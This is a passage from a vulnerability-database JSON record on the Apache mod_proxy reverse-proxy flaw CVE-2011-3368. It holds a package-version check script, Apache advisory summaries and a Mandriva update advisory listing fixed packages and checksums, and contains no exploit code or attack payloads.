NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "httpd": [{"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2011-3368"], "edition": 1, "description": "\nAn exposure was found when using mod_proxy in reverse proxy mode.\nIn certain configurations using RewriteRule with proxy flag or\nProxyPassMatch, a remote attacker could cause the reverse proxy to\nconnect to an arbitrary server, possibly disclosing sensitive\ninformation from internal web servers not directly accessible to\nattacker.\n", "modified": "2013-07-12T00:00:00", "published": "2011-09-16T00:00:00", "id": "HTTPD:428F24190DE7AFCBC94D3836B96A0602", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.0.65: mod_proxy reverse proxy exposure", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2011-3368"], "edition": 1, "description": "\nAn exposure was found when using mod_proxy in reverse proxy mode.\nIn certain configurations using RewriteRule with proxy flag or\nProxyPassMatch, a remote attacker could cause the reverse proxy to\nconnect to an arbitrary server, possibly disclosing sensitive\ninformation from internal web servers not directly accessible to\nattacker.\n", "modified": "2012-01-31T00:00:00", "published": "2011-09-16T00:00:00", "id": "HTTPD:5CBB2FE29DAB23F81203059931DCD49C", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.2.22: mod_proxy reverse proxy exposure", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-12-24T14:26:50", "bulletinFamily": "software", "cvelist": ["CVE-2011-3368"], "description": "\nAn exposure was found when using mod_proxy in reverse proxy mode.\nIn certain configurations using RewriteRule with proxy flag or\nProxyPassMatch, a remote attacker could cause the reverse proxy to\nconnect to an arbitrary server, possibly disclosing sensitive\ninformation from internal web servers not directly accessible to\nattacker.\nNo update of 1.3 will be released. Patches will be published to\nhttps://archive.apache.org/dist/httpd/patches/apply_to_1.3.42/\n", "edition": 5, "modified": "2011-10-05T00:00:00", "published": "2011-09-16T00:00:00", "id": "HTTPD:AA5F8228C297859EE599A23F56BA394E", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: mod_proxy reverse proxy exposure", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2011-3368"], "edition": 1, "description": "\nAn exposure was found when using mod_proxy in reverse proxy mode.\nIn certain configurations using RewriteRule with proxy flag,\na remote attacker could cause the reverse proxy to\nconnect to an arbitrary server, possibly disclosing sensitive\ninformation from internal web servers not directly accessible to\nattacker.\nNo update of 1.3 will be released. Patches will be published to\nhttp://archive.apache.org/dist/httpd/patches/apply_to_1.3.42/\n", "modified": "2011-10-05T00:00:00", "published": "2011-09-16T00:00:00", "id": "HTTPD:F7A5E015190D03DEDD087C99CEE5A140", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 1.3-never: mod_proxy reverse proxy exposure", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2011-3368"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2011:144\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : apache\r\n Date : September 8, 2011\r\n Affected: 2009.0, 2010.1, 2011., Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A vulnerability has been discovered and corrected in apache:\r\n \r\n The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\r\n 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\r\n interact with use of &#40;1&#41; RewriteRule and &#40;2&#41; ProxyPassMatch pattern\r\n matches for configuration of a reverse proxy, which allows remote\r\n attackers to send requests to intranet servers via a malformed URI\r\n containing an initial &#92;@ &#40;at sign&#41; character &#40;CVE-2011-3368&#41;.\r\n \r\n Packages for 2009.0 are provided as of the Extended Maintenance\r\n Program. Please visit this link to learn more:\r\n http://store.mandriva.com/product_info.php?cPath=149&amp;amp;products_id=490\r\n \r\n The updated packages have been patched to correct this issue.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2009.0:\r\n a932d2685c4daa809378200b0524c317 2009.0/i586/apache-base-2.2.9-12.13mdv2009.0.i586.rpm\r\n 73bdf263d888a5f14964004c12f6fe56 2009.0/i586/apache-devel-2.2.9-12.13mdv2009.0.i586.rpm\r\n c708cc744997e378b405e924013d4051 2009.0/i586/apache-htcacheclean-2.2.9-12.13mdv2009.0.i586.rpm\r\n fb42f0b16e0cf0b9b99f50875fb934b0 2009.0/i586/apache-mod_authn_dbd-2.2.9-12.13mdv2009.0.i586.rpm\r\n c150a3f0ab2f0447cc1314c561cbbb8a 2009.0/i586/apache-mod_cache-2.2.9-12.13mdv2009.0.i586.rpm\r\n 342a4ab8754a878929422d07d322db34 2009.0/i586/apache-mod_dav-2.2.9-12.13mdv2009.0.i586.rpm\r\n 150cca6180699492bbf350f1f23aa6fd 2009.0/i586/apache-mod_dbd-2.2.9-12.13mdv2009.0.i586.rpm\r\n 52f30a67eb099d7e1d20686c69fdd541 2009.0/i586/apache-mod_deflate-2.2.9-12.13mdv2009.0.i586.rpm\r\n f5b5a5039cc5f13c286d5cd55276cb70 2009.0/i586/apache-mod_disk_cache-2.2.9-12.13mdv2009.0.i586.rpm\r\n 903303f230149fbe88f8a5cc1c0ee960 2009.0/i586/apache-mod_file_cache-2.2.9-12.13mdv2009.0.i586.rpm\r\n 0df9ce8e9b3c4021d4bd0f13f8911ba1 2009.0/i586/apache-mod_ldap-2.2.9-12.13mdv2009.0.i586.rpm\r\n 7c96bb3725f64ea03820aae6b45b2a6d 2009.0/i586/apache-mod_mem_cache-2.2.9-12.13mdv2009.0.i586.rpm\r\n 2983af54ab604883a7cc64cf9972955a 2009.0/i586/apache-mod_proxy-2.2.9-12.13mdv2009.0.i586.rpm\r\n bda1fb3d243ea97a8ec115609a3c1e36 2009.0/i586/apache-mod_proxy_ajp-2.2.9-12.13mdv2009.0.i586.rpm\r\n cbe3ba0bad95f397071a9ab04a3a97c5 2009.0/i586/apache-mod_ssl-2.2.9-12.13mdv2009.0.i586.rpm\r\n 632c6ae498759436b83487afaef9f9df 2009.0/i586/apache-modules-2.2.9-12.13mdv2009.0.i586.rpm\r\n 0f0e190bf2026886f088ffeaf243b44f 2009.0/i586/apache-mod_userdir-2.2.9-12.13mdv2009.0.i586.rpm\r\n 8556f5990544d1e239565435f704015e 2009.0/i586/apache-mpm-event-2.2.9-12.13mdv2009.0.i586.rpm\r\n f69859bb9197171c5edc309031cfcd4f 2009.0/i586/apache-mpm-itk-2.2.9-12.13mdv2009.0.i586.rpm\r\n 894a436dc5bd4d4177f6de362de510a3 2009.0/i586/apache-mpm-peruser-2.2.9-12.13mdv2009.0.i586.rpm\r\n b88c688e5bf7555e44630012f1b87755 2009.0/i586/apache-mpm-prefork-2.2.9-12.13mdv2009.0.i586.rpm\r\n bcdd82b6d4846966c402a2dd5d7b641d 2009.0/i586/apache-mpm-worker-2.2.9-12.13mdv2009.0.i586.rpm\r\n 21b54c80dadc67221ad5cc0329343d55 2009.0/i586/apache-source-2.2.9-12.13mdv2009.0.i586.rpm \r\n c2b11978f4becbae462db2bf020a0bd7 2009.0/SRPMS/apache-2.2.9-12.13mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n 91af9d7b14f280ccbd94d1e93c2115a5 2009.0/x86_64/apache-base-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n 4289dbcf5d435f144115d37f9a118e9b 2009.0/x86_64/apache-devel-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n e7e7888ed2d7e82ce4f55d319dc354d7 2009.0/x86_64/apache-htcacheclean-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n 5341f9396f6860b1deaf1badfed9c6f2 2009.0/x86_64/apache-mod_authn_dbd-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n af81e40dab85a97d2d913b6c3a2e5ba3 2009.0/x86_64/apache-mod_cache-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n bf09f623437776e4bb584ef70a58065a 2009.0/x86_64/apache-mod_dav-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n d9394a8d7fa6fd9a7102599dbaa36138 2009.0/x86_64/apache-mod_dbd-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n 5ad77a367640a35948e99c58ba2e9aaa 2009.0/x86_64/apache-mod_deflate-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n eca18218ed5884129356e14739b4284c 2009.0/x86_64/apache-mod_disk_cache-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n a1e6fe40413404fcd9e45ee862f1448d 2009.0/x86_64/apache-mod_file_cache-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n 0d3490eb0a83cd266be094a7a831926b 2009.0/x86_64/apache-mod_ldap-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n 61c1baacc989919e0955c1e5714e92eb 2009.0/x86_64/apache-mod_mem_cache-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n 1ff3ec27c26302c9ebe724ec699edbda 2009.0/x86_64/apache-mod_proxy-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n da1080d1dfaa0e5c17736b6efc614f65 2009.0/x86_64/apache-mod_proxy_ajp-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n c47fc6b7f4a3b4824ef9009cfc03ebf9 2009.0/x86_64/apache-mod_ssl-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n 603804201a58c4bde7eeb9254d0caf6b 2009.0/x86_64/apache-modules-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n 456ca4697133a089f004a1f54213c600 2009.0/x86_64/apache-mod_userdir-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n b113323596d0bdb88824c9e940025dab 2009.0/x86_64/apache-mpm-event-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n be041721f9abceb50d65bdb6edd37352 2009.0/x86_64/apache-mpm-itk-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n 9099961b1c82d68ef972116ebe44c6f7 2009.0/x86_64/apache-mpm-peruser-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n b1ca9a27d4c02fd845ffbb62b9adb8e5 2009.0/x86_64/apache-mpm-prefork-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n d67c2ef4282309256e51163e67044d8c 2009.0/x86_64/apache-mpm-worker-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n b4972efcb6cb7e4dc5263e7d1e39dea5 2009.0/x86_64/apache-source-2.2.9-12.13mdv2009.0.x86_64.rpm \r\n c2b11978f4becbae462db2bf020a0bd7 2009.0/SRPMS/apache-2.2.9-12.13mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2010.1:\r\n 050b032c27a587a8e3cc7b7f26752255 2010.1/i586/apache-base-2.2.15-3.4mdv2010.2.i586.rpm\r\n cdd5c06f86c9eb38160d95fa5e1e429b 2010.1/i586/apache-devel-2.2.15-3.4mdv2010.2.i586.rpm\r\n c390e7597d9dfe9617d70ab3f5192d43 2010.1/i586/apache-htcacheclean-2.2.15-3.4mdv2010.2.i586.rpm\r\n d96559be627d94d45775e414ec0ae524 2010.1/i586/apache-mod_authn_dbd-2.2.15-3.4mdv2010.2.i586.rpm\r\n f3e11be1e0dd737b7a5137920912bfb1 2010.1/i586/apache-mod_cache-2.2.15-3.4mdv2010.2.i586.rpm\r\n 702df82aa3df33ac2d085f4d927e6f0d 2010.1/i586/apache-mod_dav-2.2.15-3.4mdv2010.2.i586.rpm\r\n af12753e0e90d50fbab8460d52cd70b2 2010.1/i586/apache-mod_dbd-2.2.15-3.4mdv2010.2.i586.rpm\r\n dccbb7742f2eb8bf9dd6fc6dbd4f9655 2010.1/i586/apache-mod_deflate-2.2.15-3.4mdv2010.2.i586.rpm\r\n 26757766ba1bd4a9c7148d04588fe50c 2010.1/i586/apache-mod_disk_cache-2.2.15-3.4mdv2010.2.i586.rpm\r\n d668ff48b06e5b32d455af7aaae33480 2010.1/i586/apache-mod_file_cache-2.2.15-3.4mdv2010.2.i586.rpm\r\n 4287845377dc115e5a1585729d8e6b15 2010.1/i586/apache-mod_ldap-2.2.15-3.4mdv2010.2.i586.rpm\r\n 168abd8c322604f7024a90457ced5c16 2010.1/i586/apache-mod_mem_cache-2.2.15-3.4mdv2010.2.i586.rpm\r\n 58fc1f1ae0c7028a8eac5280922482ba 2010.1/i586/apache-mod_proxy-2.2.15-3.4mdv2010.2.i586.rpm\r\n f32d9ff3f404d49b46b8b63a7597623f 2010.1/i586/apache-mod_proxy_ajp-2.2.15-3.4mdv2010.2.i586.rpm\r\n a6d6b0dc82a12609a105b7f13a60c52d 2010.1/i586/apache-mod_proxy_scgi-2.2.15-3.4mdv2010.2.i586.rpm\r\n 01ac6784b890fc3f205ab58fa2708b0c 2010.1/i586/apache-mod_reqtimeout-2.2.15-3.4mdv2010.2.i586.rpm\r\n 7d40b5f9566bbcb5a36a240f3e2281e6 2010.1/i586/apache-mod_ssl-2.2.15-3.4mdv2010.2.i586.rpm\r\n febac785b16900b8f8630277b12f732e 2010.1/i586/apache-modules-2.2.15-3.4mdv2010.2.i586.rpm\r\n 30c0051b4519bfc682da86ef5008fee4 2010.1/i586/apache-mod_userdir-2.2.15-3.4mdv2010.2.i586.rpm\r\n b7991fb35067f7f5b8c43fef70f6c6c1 2010.1/i586/apache-mpm-event-2.2.15-3.4mdv2010.2.i586.rpm\r\n bcc42aefa1d5edc1c8b28d0e87837ba9 2010.1/i586/apache-mpm-itk-2.2.15-3.4mdv2010.2.i586.rpm\r\n 6dd2d6c2c254cdc416cb6394c3ce4642 2010.1/i586/apache-mpm-peruser-2.2.15-3.4mdv2010.2.i586.rpm\r\n b075b7a1a5db8e549513862019dc4d49 2010.1/i586/apache-mpm-prefork-2.2.15-3.4mdv2010.2.i586.rpm\r\n f0a4446d35eb202894a258137c9a39ca 2010.1/i586/apache-mpm-worker-2.2.15-3.4mdv2010.2.i586.rpm\r\n 3662189a98719d869c6cd92339037634 2010.1/i586/apache-source-2.2.15-3.4mdv2010.2.i586.rpm \r\n 3f523608f5ede71397a35e53d7a82ad9 2010.1/SRPMS/apache-2.2.15-3.4mdv2010.2.src.rpm\r\n\r\n Mandriva Linux 2010.1/X86_64:\r\n c2817045a41cac3a60c6050d0c96ed2d 2010.1/x86_64/apache-base-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n ba029050d298b8bf7bdfd0ff0d8dfff2 2010.1/x86_64/apache-devel-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 9ab0bb04fa5cbab380fc7f4002672f6d 2010.1/x86_64/apache-htcacheclean-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 514f0faa3e12f9a837c80d18c42f096e 2010.1/x86_64/apache-mod_authn_dbd-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 869f6fc17fcb140345c6fc426f00a372 2010.1/x86_64/apache-mod_cache-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n b271b637ef95644aca494751bacb305e 2010.1/x86_64/apache-mod_dav-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 8c1bf792dd53c4cf534eeb66149a021a 2010.1/x86_64/apache-mod_dbd-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 80427734c2bdcb88998cd8f00d518a63 2010.1/x86_64/apache-mod_deflate-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 9d436dfa48708ff1c67430c9f96e744a 2010.1/x86_64/apache-mod_disk_cache-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 43d6300c4cdcd128bd8713009a4b9422 2010.1/x86_64/apache-mod_file_cache-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n d26fb68836d1f1238091ef30e2a29b2b 2010.1/x86_64/apache-mod_ldap-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n f2a231754bbbe745ad472418a1e68dba 2010.1/x86_64/apache-mod_mem_cache-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 69a2515e03e42ca836a7d880ae6d1048 2010.1/x86_64/apache-mod_proxy-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 2a334acc8b0e681c2523d73ba2020980 2010.1/x86_64/apache-mod_proxy_ajp-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 082e3a971973d41d007f6ee8d433a964 2010.1/x86_64/apache-mod_proxy_scgi-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n d0240e4907c53cbc15c38f852f3523f2 2010.1/x86_64/apache-mod_reqtimeout-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 8947c120a2346c5e608de186e0a3ee75 2010.1/x86_64/apache-mod_ssl-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 52b797f3e31ed58daff164b3f9339440 2010.1/x86_64/apache-modules-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 568ce8efc2c5d87f5a65f2c2c3f552c8 2010.1/x86_64/apache-mod_userdir-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n bc0ad260619fa1513c749f44e6842bfa 2010.1/x86_64/apache-mpm-event-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 2eff14b46b530cd91d8025d0bf36970c 2010.1/x86_64/apache-mpm-itk-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n c15a1dc4de6a830b3ef6151f4bab901c 2010.1/x86_64/apache-mpm-peruser-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n f016b8856f9426c49798f993197fcd64 2010.1/x86_64/apache-mpm-prefork-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 71bc0152b74ef1a03349b275abb7145d 2010.1/x86_64/apache-mpm-worker-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n c9d21030172baaedbe9bc8d438c8285b 2010.1/x86_64/apache-source-2.2.15-3.4mdv2010.2.x86_64.rpm \r\n 3f523608f5ede71397a35e53d7a82ad9 2010.1/SRPMS/apache-2.2.15-3.4mdv2010.2.src.rpm\r\n\r\n Mandriva Linux 2011:\r\n fdf647dc322f45ba25112fb18761a8ca 2011/i586/apache-base-2.2.21-0.2-mdv2011.0.i586.rpm\r\n b1cd17efb6f49779d3f1608f7ce12317 2011/i586/apache-devel-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 5003144977743f8092bc2657bb8a5744 2011/i586/apache-htcacheclean-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 20b63b8bad01f15558bed39ae77735ad 2011/i586/apache-mod_authn_dbd-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 30d70e38df5ab5395a8fb2ded1eeb24d 2011/i586/apache-mod_cache-2.2.21-0.2-mdv2011.0.i586.rpm\r\n efecc88f522b8ceda095c150bb79b8c1 2011/i586/apache-mod_dav-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 38c556b4325441228f38fb13db21334d 2011/i586/apache-mod_dbd-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 8838bc6f398879fc4a012e72fa0460f6 2011/i586/apache-mod_deflate-2.2.21-0.2-mdv2011.0.i586.rpm\r\n b17372865f84422d9159cc7bec915918 2011/i586/apache-mod_disk_cache-2.2.21-0.2-mdv2011.0.i586.rpm\r\n d5a6b009940820ce886c5562c1aaec51 2011/i586/apache-mod_file_cache-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 2622ca1fd2eb31d57bf7dd8739862f6f 2011/i586/apache-mod_ldap-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 2b5cfd82bfe043be558c5f64b793eae4 2011/i586/apache-mod_mem_cache-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 4a931dcee38c86bb12de9f0e2981c11a 2011/i586/apache-mod_proxy-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 2f8fb519cb0a2617c3bc87a211af441f 2011/i586/apache-mod_proxy_ajp-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 66c2411ece3b4e6d3e77526869fac866 2011/i586/apache-mod_proxy_scgi-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 75eef4373837415e36372776380819f7 2011/i586/apache-mod_reqtimeout-2.2.21-0.2-mdv2011.0.i586.rpm\r\n fa70ff654b3efe6d28969aa7460a9977 2011/i586/apache-mod_ssl-2.2.21-0.2-mdv2011.0.i586.rpm\r\n dc3a2f9f654727148ec6623a7f68aa3d 2011/i586/apache-modules-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 4b7d982f9a0e16c75e3d62127651bd73 2011/i586/apache-mod_userdir-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 46dd5bf60e0cc8aaa098136ffbc4d1f8 2011/i586/apache-mpm-event-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 750b7f77b7ac0ed715427869af54fa33 2011/i586/apache-mpm-itk-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 1a67882e778e3f3bc89b0ef45f039ea6 2011/i586/apache-mpm-peruser-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 7e85783e129e133a4b4de06484f50597 2011/i586/apache-mpm-prefork-2.2.21-0.2-mdv2011.0.i586.rpm\r\n b3ed18bc46d66240096aa65f5c557ff9 2011/i586/apache-mpm-worker-2.2.21-0.2-mdv2011.0.i586.rpm\r\n 1a80519a9a4a5b83d6c136506eeb5ae0 2011/i586/apache-source-2.2.21-0.2-mdv2011.0.i586.rpm \r\n 0208ab576bca6346db61084a4247c585 2011/SRPMS/apache-2.2.21-0.2.src.rpm\r\n\r\n Mandriva Linux 2011/X86_64:\r\n 87da9845764ce52f30350a2da3f1bb50 2011/x86_64/apache-base-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 382426ba9336ddd28b26a25e3306effa 2011/x86_64/apache-devel-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n d39b4ad5420a27e886ee33102753611e 2011/x86_64/apache-htcacheclean-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n b9f07f25fada0f52f8467dc390b6c910 2011/x86_64/apache-mod_authn_dbd-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 396f1addba810264b4d7d8eac405c05d 2011/x86_64/apache-mod_cache-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n ae6cd0e23ccd835177f060debb4c373a 2011/x86_64/apache-mod_dav-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 75131d0a822f92b946a28f4c29925018 2011/x86_64/apache-mod_dbd-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 88301617766cafe8e1d142ec30ff7a32 2011/x86_64/apache-mod_deflate-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 7f03884c099d174c94ab2ca5c74ddb5f 2011/x86_64/apache-mod_disk_cache-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n ee9d59bf2fde441bdeadd810f6f624ee 2011/x86_64/apache-mod_file_cache-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 60e5e7c1df99feaf019f5203deae62cf 2011/x86_64/apache-mod_ldap-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n c138331a28ac50ba59cab8499a6c8b5d 2011/x86_64/apache-mod_mem_cache-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 1d8183c8b428f6a824a1f9b7a1335124 2011/x86_64/apache-mod_proxy-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 587a07a541fb759edf6cf4e7723a8f13 2011/x86_64/apache-mod_proxy_ajp-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 643d55f506ddc7e2d8d9eeb370a7d5d0 2011/x86_64/apache-mod_proxy_scgi-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 317f850263dc7a177c7aeca49ff73c0f 2011/x86_64/apache-mod_reqtimeout-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n d13268e72655c84407bc4f84b7dfbc63 2011/x86_64/apache-mod_ssl-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n aba1a4f6b8a2e165d88dea70da96aa38 2011/x86_64/apache-modules-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n afa4e495f86f5c61994947211833eb87 2011/x86_64/apache-mod_userdir-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n c30be0170ee148a2b26bf90d56321b9c 2011/x86_64/apache-mpm-event-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n fe799582be71a26191caff516250d9bb 2011/x86_64/apache-mpm-itk-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 901ef8c7c3e97d00d08528bf9e4711b1 2011/x86_64/apache-mpm-peruser-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n d6309de31d78ced4ddfb4cd339bda2a1 2011/x86_64/apache-mpm-prefork-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 6e5481db63f7ee78b37bf4341f30f1e0 2011/x86_64/apache-mpm-worker-2.2.21-0.2-mdv2011.0.x86_64.rpm\r\n 976de27a1426d6d4d0eeaf3a35b44564 2011/x86_64/apache-source-2.2.21-0.2-mdv2011.0.x86_64.rpm \r\n 0208ab576bca6346db61084a4247c585 2011/SRPMS/apache-2.2.21-0.2.src.rpm\r\n\r\n Mandriva Enterprise Server 5:\r\n 362272e9ac2693eec7b635adc0d21703 mes5/i586/apache-base-2.2.9-12.13mdvmes5.2.i586.rpm\r\n d96a49a2c5e91ded681961ff6cc952a4 mes5/i586/apache-devel-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 49603b007ba8170dc03d2c126c84e50d mes5/i586/apache-htcacheclean-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 3380d84b972a6a463b045737ff613b49 mes5/i586/apache-mod_authn_dbd-2.2.9-12.13mdvmes5.2.i586.rpm\r\n de7fa15db92d1d30e2da0445c1809813 mes5/i586/apache-mod_cache-2.2.9-12.13mdvmes5.2.i586.rpm\r\n a8010890a6a571f95020275b6f142bca mes5/i586/apache-mod_dav-2.2.9-12.13mdvmes5.2.i586.rpm\r\n b06ae064db3f74b0f784bf2901f72c2f mes5/i586/apache-mod_dbd-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 7dacb5f1cc7ba1cf990905290fdae463 mes5/i586/apache-mod_deflate-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 1c8585291e70c6a3d3809bad1f79e683 mes5/i586/apache-mod_disk_cache-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 3c1a95ac86df5dd6a3c1cb7b4daba63e mes5/i586/apache-mod_file_cache-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 0b6c33e07fe7f4c448dba48b5750f668 mes5/i586/apache-mod_ldap-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 0a5ac07dddf6dfb4f81260180f5400c7 mes5/i586/apache-mod_mem_cache-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 2e88a664547e82bf0a09e7a59df3cfb1 mes5/i586/apache-mod_proxy-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 02f77738b01c4fac6cbfd174aaf1f3dd 